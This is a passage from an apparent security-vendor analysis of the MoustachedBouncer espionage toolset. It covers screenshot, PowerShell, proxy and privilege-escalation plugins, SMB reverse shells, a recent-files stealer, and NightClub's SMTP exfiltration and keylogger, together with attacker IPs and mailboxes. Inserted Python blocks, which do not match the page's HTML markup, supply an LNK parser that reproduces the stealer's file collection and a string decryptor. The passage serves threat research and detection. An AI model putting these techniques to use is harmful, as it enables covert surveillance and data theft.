lang=\"EN-US\">Takes screenshots using the <a href=\"https:\/\/github.com\/kbinani\/screenshot\"><em>kbinani\/screenshot<\/em><\/a> library. Screenshots are saved in <\/span><span><span lang=\"EN-US\">.\\AAct\\data\\&lt;d&gt;_&lt;s&gt;.dat<\/span><\/span><span lang=\"EN-US\"> (on the SMB share) where <\/span><span><span lang=\"EN-US\">&lt;d&gt;<\/span><\/span><span lang=\"EN-US\"> is the active display number and <\/span><span><span lang=\"EN-US\">&lt;s&gt;<\/span><\/span><span lang=\"EN-US\"> the date. 
It sleeps 15 seconds between each screenshot.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">C:\\Users\\Public\\driverpack\\driverpackUpdate.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Executes PowerShell scripts with <\/span><span><span lang=\"EN-US\">powershell.exe -NoProfile -NonInteractive &lt;command&gt;<\/span><\/span><span lang=\"EN-US\">, where <\/span><span><span lang=\"EN-US\">&lt;command&gt;<\/span><\/span><span lang=\"EN-US\"> is read from the file <\/span><span><span lang=\"EN-US\">.\\idata<\/span><\/span><span lang=\"EN-US\">. The output is written to <\/span><span><span lang=\"EN-US\">.\\odata<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">C:\\Users\\Public\\driverpack\\sdrive.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Executes <\/span><span><span lang=\"EN-US\">C:\\Users\\Public\\driverpack\\driverpackUpdate.exe<\/span><\/span><span lang=\"EN-US\"> (the plugin above) with elevated rights via <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2021-1732\"><em><span>CVE-2021-1732<\/span><\/em><\/a>, a win32k local privilege escalation. The code was likely inspired by a PoC on <a href=\"https:\/\/github.com\/KaLendsi\/CVE-2021-1732-Exploit\/blob\/main\/ExploitTest\/ExploitTest.cpp\"><em>GitHub<\/em><\/a> and uses the <a href=\"https:\/\/github.com\/zyantific\/zydis\"><em>zydis<\/em><\/a> disassembler and code generation library.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\\\209.19.37[.]184\\driverpack\\officetelemetry.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">A reverse SOCKS proxy strongly inspired by the GitHub repository <a href=\"https:\/\/github.com\/kost\/revsocks\"><em>revsocks<\/em><\/a>. 
We were unable to retrieve the command line parameters with the proxy IP address.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\\\38.9.8[.]78\\driverpack\\DPU.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Another sample of the PowerShell plugin.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">%userprofile%\\appdata\\nod32update\\nod32update.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Another sample of the reverse proxy plugin.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\\\59.6.8[.]25\\outlooksync\\outlooksync.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Takes screenshots; it is similar to the first plugin. Images are saved in <\/span><span><span lang=\"EN-US\">.\/logs\/${DATETIME}.dat<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"62%\">\n<p><span><strong><span lang=\"EN-US\">\\\\52.3.8[.]25\\oracle\\oracleTelemetry.exe<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"37%\">\n<p><span lang=\"EN-US\">Screenshot plugin packed with <a href=\"https:\/\/www.oreans.com\/Themida.php\"><em>Themida<\/em><\/a>.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Interestingly, the plugins also use SMB shares for data exfiltration. There is no C&amp;C server outside the attackers\u2019 premises to look at or to take down, and there seems to be no way to reach that C&amp;C server from the internet. This gives the attackers\u2019 network infrastructure high resiliency.<\/p>\n<h3>SharpDisco and NightClub plugins<\/h3>\n<p>In January 2020 we observed a MoustachedBouncer dropper, which we named SharpDisco, being downloaded from <span>https:\/\/mail.mfa.gov.&lt;redacted&gt;\/EdgeUpdate.exe<\/span> by a Microsoft Edge process. 
It is not clear how the attackers were able to tamper with HTTPS traffic, but it is possible that an invalid TLS certificate warning was shown to the victim. Another possibility is that MoustachedBouncer compromised this governmental website.<\/p>\n<h4>SharpDisco (SHA-1: A3AE82B19FEE2756D6354E85A094F1A4598314AB)<\/h4>\n<p>SharpDisco is a dropper developed in C#. It displays a fake update window, shown in Figure 7, while creating two scheduled tasks in the background.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 7. Fake Microsoft Edge update window\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/edge-update.png\" title=\"Figure 7. Fake Microsoft Edge update window\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">7<\/span><\/em><span lang=\"EN-US\"><em>. Fake Microsoft Edge update window<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>These scheduled tasks are:<\/p>\n<p><img decoding=\"async\" alt=\"scheduled tasks\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/scheduled-tasks.png\" title=\"\" width=\"\"><\/p>\n<p><span>WINCMDA.EXE<\/span> and <span>WINCMDB.EXE<\/span> are probably just <span>cmd.exe<\/span> renamed. Every minute, the first task reads what is in <span>\\\\24.9.51[.]94\\EDGEUPDATE\\EDGEAIN<\/span> (on the SMB share), pipes it to <span>cmd.exe<\/span>, and writes the output to <span>\\\\24.9.51[.]94\\EDGEUPDATE\\EDGEAOUT<\/span>. The second task does the same with the <span>EDGEBIN<\/span> and <span>EDGEBOUT<\/span> files. From a higher viewpoint, those tasks are reverse shells with a one-minute latency, since a command placed on the share is only picked up on the next run of the task.<\/p>\n<p>Then, as shown in Figure 8, the dropper sends a DNS request for an unregistered domain, <span>edgeupdate-security-windows[.]com<\/span>. This is similar to what the 2022 Disco dropper does.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 8. 
Dropper used in 2020\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/dropper-2020.png\" title=\"Figure 8. Dropper used in 2020\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">8<\/span><\/em><span lang=\"EN-US\"><em>. Dropper used in 2020<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>ESET telemetry shows that the reverse shell was used to drop a genuine Python interpreter in <span>C:\\Users\\Public\\WinTN\\WinTN.exe<\/span>. We then observed two plugins being dropped on disk by cmd.exe, which means they were likely dropped by the reverse shell as well. The two plugins are:<\/p>\n<ul>\n<li>A recent-files stealer in <span>C:\\Users\\Public\\WinSrcNT\\It11.exe<\/span><\/li>\n<li>An external drive monitor in <span>C:\\Users\\Public\\It3.exe<\/span><\/li>\n<\/ul>\n<p>It is interesting to note that those plugins share code with NightClub (described in the section NightClub \u2013 2017 (SHA-1: <span>F92FE4DD679903F75ADE64DC8A20D46DFBD3B277<\/span>) below). This allowed us to link the Disco and NightClub toolsets.<\/p>\n<h4>Recent-files stealer (SHA-1: 0DAEA89F91A55F46D33C294CFE84EF06CE22E393)<\/h4>\n<p>This plugin is a Windows executable named <span>It11.exe<\/span>. We believe it was executed via the reverse shell mentioned above. There is no persistence mechanism implemented in the plugin.<\/p>\n<p>It gets the files recently opened on the machine by reading the content of the folder <span>%USERPROFILE%\\Recent<\/span> (on Windows XP) or of <span>%APPDATA%\\Microsoft\\Windows\\Recent<\/span> (in newer Windows versions). Those folders contain LNK files, each pointing to a recently opened file.<\/p>\n<p>The plugin embeds its own LNK format parser in order to extract the path to the original file.<\/p>\n<p>We were unable to make this plugin work, but static analysis shows that the files are exfiltrated to the SMB share <span>\\\\24.9.51[.]94\\EDGEUPDATE\\update<\/span>. 
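The LNK parsing the stealer carries along is small enough to show in full. Each entry in the Recent folder is a Shell Link file (MS-SHLLINK): a 76-byte header with a flags word, an optional item-ID list, an optional LinkInfo block that carries the absolute target as LocalBasePath plus CommonPathSuffix, and optional StringData such as a relative path. The following is an added example written for this page from that layout, not the plugin's own code; build_lnk constructs a sample file so the parser can be exercised without reading a real profile, and the paths used in its tests are invented.

```python
"""Shell Link (.LNK) parsing as needed to recover a recent-file target.

parse_lnk walks header -> IDList (skipped) -> LinkInfo -> StringData and returns
the absolute target when LinkInfo carries one, otherwise the RelativePath.
build_lnk produces a minimal, spec-conformant file for testing.
"""
import struct
import uuid
from pathlib import Path

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))


def is_lnk(buf: bytes) -> bool:
    return len(buf) >= 0x4C and buf[:4] == b"\x4c\x00\x00\x00" and buf[4:20] == LNK_CLSID


def _cstr(buf: bytes, off: int, unicode: bool = False) -> str:
    """NUL-terminated string at off: UTF-16LE when unicode, else the ANSI code page."""
    if unicode:
        end = off
        while buf[end:end + 2] not in (b"\x00\x00", b""):
            end += 2
        return buf[off:end].decode("utf-16-le")
    return buf[off:buf.index(b"\x00", off)].decode("cp1252", errors="replace")


def parse_lnk(buf: bytes) -> dict:
    if not is_lnk(buf):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", buf, 20)[0]
    info = {"flags": flags, "local_base_path": None, "common_path_suffix": ""}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:                  # IDListSize + IDList, not needed here
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:
        base = off
        size, hdr, li_flags, _vol, lbp_off, _cnrl, cps_off = struct.unpack_from("<7I", buf, base)
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            lbp = cps = None
            if hdr >= 0x24:                               # optional Unicode offsets present
                lbp_u, cps_u = struct.unpack_from("<2I", buf, base + 0x1C)
                lbp = _cstr(buf, base + lbp_u, True) if lbp_u else None
                cps = _cstr(buf, base + cps_u, True) if cps_u else None
            info["local_base_path"] = lbp if lbp is not None else _cstr(buf, base + lbp_off)
            info["common_path_suffix"] = cps if cps is not None else _cstr(buf, base + cps_off)
        off = base + size
    unicode = bool(flags & IS_UNICODE)                   # StringData: u16 count, then chars
    for bit, key in STRING_DATA:
        if flags & bit:
            n = struct.unpack_from("<H", buf, off)[0]
            raw = buf[off + 2: off + 2 + n * (2 if unicode else 1)]
            info[key] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
            off += 2 + len(raw)
    if info["local_base_path"] is not None:
        info["target"] = info["local_base_path"] + info["common_path_suffix"]
    else:
        info["target"] = info.get("relative_path")
    return info


def recent_targets(folder: str) -> list:
    """Targets of every LNK in a Recent folder, which is what the stealer collects."""
    out = []
    for p in Path(folder).glob("*.lnk"):
        data = p.read_bytes()
        if is_lnk(data):
            out.append(parse_lnk(data)["target"])
    return out


def build_lnk(local_path: str, relative_path: str = None) -> bytes:
    """Constructed LNK: LinkInfo with an ANSI LocalBasePath, optional Unicode RelativePath."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_RELATIVE_PATH if relative_path else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<4I", 0x11, 3, 0x1234ABCD, 0x10) + b"\x00"   # DRIVE_FIXED, no label
    lbp, cps = local_path.encode("cp1252") + b"\x00", b"\x00"
    hdr = 0x1C
    lbp_off = hdr + len(volume_id)
    cps_off = lbp_off + len(lbp)
    link_info = struct.pack("<7I", cps_off + len(cps), hdr, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            hdr, lbp_off, 0, cps_off) + volume_id + lbp + cps
    tail = b""
    if relative_path:
        tail = struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    return header + link_info + tail
```

On a real profile, `recent_targets(os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Recent"))` yields the same list the plugin builds before exfiltration; comparing that list against what a DLP or EDR policy considers sensitive is a quick way to gauge exposure from this plugin. Network targets are stored in a CommonNetworkRelativeLink block that this example skips, so for those entries only the relative path is returned.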
The plugin maintains a list of already exfiltrated files, and their CRC-32 checksums, in <span>%TEMP%\\index.dat<\/span>. This likely avoids retransmitting the same file more than once.<\/p>\n<h4>External drive monitor (SHA-1: 11CF38D971534D9B619581CEDC19319962F3B996)<\/h4>\n<p>This plugin is a Windows executable named <span>It3.exe<\/span>. As with the recent-files stealer, it doesn\u2019t implement any persistence mechanism.<\/p>\n<p>The plugin calls <span>GetLogicalDrives<\/span> in a loop to get a list of all connected drives, including removable ones such as USB keys. Then, it does a raw copy of the NTFS volume of each removable drive and writes it to the current working directory, <span>C:\\Users\\Public<\/span> in our example. The filename is a randomly generated string of six to eight alphanumeric characters, for example <span>heNNYwmY<\/span>.<\/p>\n<p>It maintains a log file in <span>&lt;working directory&gt;\\index.dat<\/span> with the CRC-32 checksums of the copied disks.<\/p>\n<p>The plugin doesn\u2019t appear to have any exfiltration capabilities. It is likely that the staged drive dumps are later retrieved using the reverse shell.<\/p>\n<h3>NightClub<\/h3>\n<p>Since 2014, MoustachedBouncer has been using a malware framework we named NightClub because it contains a C++ class named <span>nightclub<\/span>. We found samples from 2014, 2017, 2020, and 2022. This section describes the evolution of NightClub from a simple backdoor to a fully modular C++ implant.<\/p>\n<p>In summary, NightClub is an implant family using emails for its C&amp;C communications. Since 2016, additional modules could be delivered by email to extend its spying capabilities.<\/p>\n<h4>NightClub \u2013 2014<\/h4>\n<p>This is the oldest known version of NightClub. 
We found a dropper and an orchestrator.<\/p>\n<p>The dropper (SHA-1: <span>0401EE7F3BC384734BF7E352C4C4BC372840C30D<\/span>) is an executable named <span>EsetUpdate-0117583943.exe<\/span>, and it was uploaded to VirusTotal from Ukraine on 2014-11-19. We don\u2019t know how it was distributed at that time.<\/p>\n<p>The main function, illustrated in Figure 9, loads the resource <span>MEMORY<\/span> and writes its content in <span>%SystemRoot%System32creh.dll<\/span>. It is stored in cleartext in the PE resource.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 9. Main function of the dropper\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-main-dropper.png\" title=\"Figure 9. Main function of the dropper\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">9<\/span><\/em><span lang=\"EN-US\"><em>. Main function of the dropper<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Then, the dropper modifies the Creation, Access, and Write timestamps of <span>creh.dll<\/span> to those of the genuine Windows DLL <span>user32.dll.<\/span><\/p>\n<p>Finally, it creates a Windows service named <span>WmdmPmSp<\/span> and sets, in the registry, its <span>ServiceDll<\/span> to <span>%SystemRoot%System32creh.dll \u2013<\/span> see Figure 10.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 10. Modification of the value ServiceDll\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-servicedll.png\" title=\"Figure 10. Modification of the value ServiceDll\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">10<\/span><span lang=\"EN-US\">. Modification of the value <\/span><span><span lang=\"EN-US\">ServiceDll<\/span><\/span><\/em><\/p>\n<\/figcaption><\/figure>\n<p>The previously dropped DLL, <span>creh.dll<\/span> (SHA-1: <span>5B55250CC0DA407201B5F042322CFDBF56041632<\/span>) is the NightClub orchestrator. 
It has a single export named <span>ServiceMain<\/span> and its PDB path is <span>D:ProgrammingProjectsWorkSwampThingReleaseWin32WorkingDll.pdb.<\/span><\/p>\n<p>It is written in C++ and the names of some methods and classes are present in the RTTI data \u2013 see Figure 11.<\/p>\n<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 11. Method and class names from the RTTI data\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-11.png\" title=\"Figure 11. Method and class names from the RTTI data\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">11<\/span><\/em><span lang=\"EN-US\"><em>. Method and class names from the RTTI data<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Some of the strings are encrypted using the following linear congruential generator (LCG): <span>staten+1 = (690069 \u00d7 staten + 1) mod 232<\/span>. For each encrypted string, a seed (state0) between 0 and 255 is provided. To decrypt a string, the <span>staten<\/span> is subtracted from each encrypted <span>byten<\/span>. An example of an encrypted string structure is shown in Figure 12.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 12. Encrypted string format\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-encrypted-string.png\" title=\"Figure 12. Encrypted string format\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">12<\/span><\/em><span lang=\"EN-US\"><em>. Encrypted string format<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>A non-encrypted log file is present in <span>C:WindowsSystem32servdll.log<\/span>. It contains very basic information about the initialization of the orchestrator \u2013 see Figure 13.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 13. Log file\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-log-file.png\" title=\"Figure 13. 
Log file\" width=\"\"><figcaption>\n<p><a><\/a><em><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">13<\/span><span lang=\"EN-US\">. Log file<\/span><\/em><\/p>\n<\/figcaption><\/figure>\n<p>NightClub has two main capabilities:<\/p>\n<p>\u2022<span><br \/>\n<\/span>Monitoring files<\/p>\n<p>\u2022<span><br \/>\n<\/span>Exfiltrating data via SMTP (email)<\/p>\n<h5>File monitor<\/h5>\n<p>Functionality implemented here is very close to that of the recent file monitor plugin seen in 2020 and described above. It also browses the directories <span>%USERPROFILE%Recent<\/span> on Windows XP, and in newer Windows versions <span>%APPDATA%MicrosoftWindowsRecent<\/span>, and implements the same LNK parser \u2013 see Figure 14 and Figure 15.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 14. LNK parser (2014 sample \u2013 5B55250CC0DA407201B5F042322CFDBF56041632)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-lnk-parser.png\" title=\"Figure 14. LNK parser (2014 sample \u2013 5B55250CC0DA407201B5F042322CFDBF56041632)\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">14<\/span><span lang=\"EN-US\">. LNK parser (2014 sample \u2013 <\/span><span><span lang=\"EN-US\">5B55250CC0DA407201B5F042322CFDBF56041632<\/span><\/span><\/em><span lang=\"EN-US\"><em>)<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<figure><img decoding=\"async\" alt=\"Figure 15. LNK parser (2020 sample \u2013 0DAEA89F91A55F46D33C294CFE84EF06CE22E393)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2020-lnk-parser-1.png\" title=\"Figure 15. LNK parser (2020 sample \u2013 0DAEA89F91A55F46D33C294CFE84EF06CE22E393)\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"FR\">Figure <\/span><span lang=\"FR\">15<\/span><span lang=\"FR\">. 
LNK parser (2020 sample \u2013 <\/span><span><span lang=\"FR\">0DAEA89F91A55F46D33C294CFE84EF06CE22E393<\/span><\/span><\/em><span lang=\"FR\"><em>)<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<\/p>\n<p>The files retrieved from the LNK files are copied to <span>%TEMP%&lt;original filename&gt;.bin<\/span>. Note that unlike the 2020 variant, only files with extensions <span>.doc<\/span>, <span>.docx<\/span>, <span>.xls<\/span>, <span>.xslx<\/span>, or <span>.pdf<\/span> are copied.<\/p>\n<p>It also monitors removable drives in a loop, in order to steal files from them.<\/p>\n<h5>SMTP C&amp;C communications<\/h5>\n<p>NightClub uses the SMTP protocol to exfiltrate data. Even if C&amp;C communication by email is not unique to MoustachedBouncer and is also used by other adversaries such as Turla (see <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2019\/05\/ESET-LightNeuron.pdf\">LightNeuron<\/a> and the <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2018\/08\/Eset-Turla-Outlook-Backdoor.pdf\">Outlook<\/a> backdoor), it is quite rare. The code is based on the CSmtp project available on <a href=\"https:\/\/github.com\/korisk\/csmtp\/blob\/master\/CSmtp.cpp\">GitHub<\/a>. The email accounts\u2019 information is hardcoded, encrypted with the LCG algorithm. In the sample we analyzed, the mail configuration is:<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>SMTP server<\/strong>: <span>smtp.seznam.cz<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender address<\/strong>: <span>glen.morriss75@seznam[.]cz<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender password<\/strong>: &lt;redacted&gt;<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Recipient address<\/strong>: <span>SunyaF@seznam[.]cz<\/span><\/p>\n<p>seznam.cz is a Czech web portal offering a free webmail service. 
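The LCG string encryption described for the 2014 orchestrator above is simple enough to reimplement for analysis. The following Python is an added example (not code from ESET or from the sample) that generates the keystream with the parameters the page gives, state_{n+1} = (690069 × state_n + 1) mod 2^32, and subtracts it from the encrypted bytes. The page does not say whether the seed itself or the first derived state pairs with the first byte; this assumes the seed is state_0 and is used for byte_0. Because the seed is a single byte, the block also shows that every string can be recovered by trying all 256 seeds even when the seed field cannot be located; encrypt_string exists only to build test vectors.

```python
from typing import List, Tuple

# LCG parameters as given on the page: state_{n+1} = (690069 * state_n + 1) mod 2^32
LCG_MULTIPLIER = 690069
LCG_INCREMENT = 1
LCG_MODULUS = 1 << 32


def lcg_keystream(seed: int, length: int) -> List[int]:
    """Low byte of state_0, state_1, ..., state_{length-1}.

    Assumption (not stated on the page): state_0 is the seed itself and is
    the value combined with the first encrypted byte.
    """
    if not 0 <= seed <= 255:
        raise ValueError("NightClub seeds are a single byte (0-255)")
    out, state = [], seed
    for _ in range(length):
        out.append(state & 0xFF)
        state = (LCG_MULTIPLIER * state + LCG_INCREMENT) % LCG_MODULUS
    return out


def decrypt_string(seed: int, encrypted: bytes) -> bytes:
    """byte_n - state_n (mod 256) for every byte, as the page describes."""
    keystream = lcg_keystream(seed, len(encrypted))
    return bytes((b - k) & 0xFF for b, k in zip(encrypted, keystream))


def encrypt_string(seed: int, plaintext: bytes) -> bytes:
    """Inverse of decrypt_string; used here only to build test vectors."""
    keystream = lcg_keystream(seed, len(plaintext))
    return bytes((b + k) & 0xFF for b, k in zip(plaintext, keystream))


def brute_force_seeds(encrypted: bytes) -> List[Tuple[int, bytes]]:
    """Try all 256 seeds and keep the decryptions that are printable ASCII.

    The one-byte seed space makes this instantaneous, so an analyst who
    cannot find the seed field can still recover every encrypted string.
    """
    hits = []
    for seed in range(256):
        plaintext = decrypt_string(seed, encrypted)
        if plaintext and all(0x20 <= c < 0x7F for c in plaintext):
            hits.append((seed, plaintext))
    return hits
```

With seed 0 the keystream starts 0x00, 0x01, 0x96, 0x4F, which is a quick way to confirm the multiplier and modulus against a decompiled sample before trusting the decryptor on real strings.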
We believe the attackers created their own email accounts, instead of compromising legitimate ones.<\/p>\n<p>NightClub exfiltrates the files previously copied to <span>%TEMP%<\/span> by the file monitor functionality (<span>FileMonitor<\/span> in Figure 11). They\u2019re encoded in base64 and added as an attachment. The attachment name is the original filename with the .bin extension.<\/p>\n<p>Figure 16 shows the exfiltration of a file via SMTP. NightClub authenticates using the credentials for the <span>glen.morriss75@seznam[.]cz<\/span> account and sends an email to <span>SunyaF@seznam[.]cz<\/span> with the stolen file attached.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 16. TCP stream of the SMTP communication from our test machine\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure16.png\" title=\"Figure 16. TCP stream of the SMTP communication from our test machine\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">16<\/span><\/em><span lang=\"EN-US\"><em>. TCP stream of the SMTP communication from our test machine<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<\/p>\n<p>Note that some headers that might look suspicious at first sight are the defaults from the CSmtp project, so they are probably not distinctive. These include:<\/p>\n<p>\u2022<span><br \/>\n<\/span><span>X-Mailer: The Bat! (v3.02) Professional<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><span>Content-Type: multipart\/mixed; boundary=&#8221;__MESSAGE__ID__54yg6f6h6y456345&#8243;<\/span><\/p>\n<p>The Bat! is an email client widely used in Eastern Europe. As such, the <span>X-Mailer<\/span> header likely blends in with email traffic in Belarus.<\/p>\n<h4>NightClub \u2013 2017 (SHA-1: F92FE4DD679903F75ADE64DC8A20D46DFBD3B277)<\/h4>\n<p>In 2017, we found a more recent version of NightClub, which was compiled on 2017-06-05. On the victim\u2019s machine, it was located at <span>C:WindowsSystem32metamn.dll<\/span>. 
Its filename in the DLL export directory is <span>DownloaderService.dll<\/span>, and it has a single export named <span>ServiceMain<\/span>. It contains the PDB path <span>D:AbcdMainProjectRootsrcProjectsMainSInkReleasex64EtfFavoriteFinder.pdb. <\/span><\/p>\n<p>To persist, it creates a Windows service named <span>WmdmPmSp<\/span>, as in previous versions. Unfortunately, we have not been able to recover the dropper.<\/p>\n<p>This NightClub version also includes a few C++ class and method names, including <span>nightclub<\/span>, in the RTTI data \u2013 see Figure 17.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 17. Method and class names from the RTTI data of the 2017 NightClub version\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-17.png\" title=\"Figure 17. Method and class names from the RTTI data of the 2017 NightClub version\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">17<\/span><\/em><span lang=\"EN-US\"><em>. Method and class names from the RTTI data of the 2017 NightClub version<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>As in previous versions, C&amp;C communications use the SMTP protocol, via the CSmtp library, with hardcoded credentials. In the sample we analyzed, the mail configuration is:<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>SMTP server<\/strong>: <span>smtp.mail.ru<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender address<\/strong>: <span>fhtgbbwi@mail[.]ru<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender password<\/strong>: [redacted]<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Recipient address<\/strong>: <span>nvjfnvjfnjf@mail[.]ru<\/span><\/p>\n<p>The main difference is that they switched the free email provider from Seznam.cz to Mail.ru.<\/p>\n<p>This NightClub version uses external plugins stored in the folder <span>%APPDATA%NvmFilter<\/span>. 
They are DLLs named <span>&lt;random&gt;.cr <\/span>(e.g., <span>et2z7q0FREZ.cr<\/span>) with a single export named <span>Starts<\/span>. We have identified two plugins: a keylogger and a file monitor.<\/p>\n<h5>Keylogger (SHA-1: 6999730D0715606D14ACD19329AF0685B8AD0299)<\/h5>\n<p>This plugin was stored in <span>%APPDATA%NvmFilteret2z7q0FREZ.cr<\/span> and is a DLL with one export, <span>Starts<\/span>. It contains the PDB path <span>D:ProgrammingProjectsAutogenKhAutogenAlgReleasex64SearchIdxDll.pdb<\/span> and was developed in C++. RTTI data shows a few class names \u2013 see Figure 18.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 18. Method and class names from the RTTI data of the NightClub keylogger plugin\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-18.png\" title=\"Figure 18. Method and class names from the RTTI data of the NightClub keylogger plugin\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">18<\/span><\/em><span lang=\"EN-US\"><em>. Method and class names from the RTTI data of the NightClub keylogger plugin<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The keylogger implementation is rather traditional, using the Windows <span>GetKeyState<\/span> API function \u2013 see Figure 19.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 19. NightClub keylogger\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/keylogger.png\" title=\"Figure 19. 